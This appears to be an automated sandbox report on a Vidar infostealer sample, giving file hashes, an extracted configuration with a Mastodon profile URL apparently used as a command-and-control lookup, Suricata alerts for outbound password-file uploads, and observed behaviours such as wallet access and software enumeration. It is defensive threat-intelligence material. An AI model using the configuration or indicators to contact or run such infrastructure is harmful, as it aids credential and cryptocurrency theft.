General
-
Target
eufive_20211018-171516
-
Size
733KB
-
Sample
211018-tser9sehbk
-
MD5
d74e7162c1b577a0afa55ff1a779bf24
-
SHA1
70022590810fcfde937f3392b1f37d1b8e8c5227
-
SHA256
50ca4376290ba797fb1084013cfffa0c58412da24fef17e37318fd80eef3493f
-
SHA512
0c6fb8d1d01ee3ab5e11f33333851782a120eab204457f1061f59a7c2f95c5b2da1cbbad1ddff1a64542a9d43e45bb2938125559801400be7709dba7c69fc33e
Static task
static1
Behavioral task
behavioral1
Sample
eufive_20211018-171516.exe
Resource
win7-en-20210920
Malware Config
Extracted
vidar
41.5
865
https://mas.to/@xeroxxx
-
profile_id
865
Targets
-
-
Target
eufive_20211018-171516
-
Size
733KB
-
MD5
d74e7162c1b577a0afa55ff1a779bf24
-
SHA1
70022590810fcfde937f3392b1f37d1b8e8c5227
-
SHA256
50ca4376290ba797fb1084013cfffa0c58412da24fef17e37318fd80eef3493f
-
SHA512
0c6fb8d1d01ee3ab5e11f33333851782a120eab204457f1061f59a7c2f95c5b2da1cbbad1ddff1a64542a9d43e45bb2938125559801400be7709dba7c69fc33e
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
Vidar Stealer
-
Downloads MZ/PE file
-
Loads dropped DLL
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-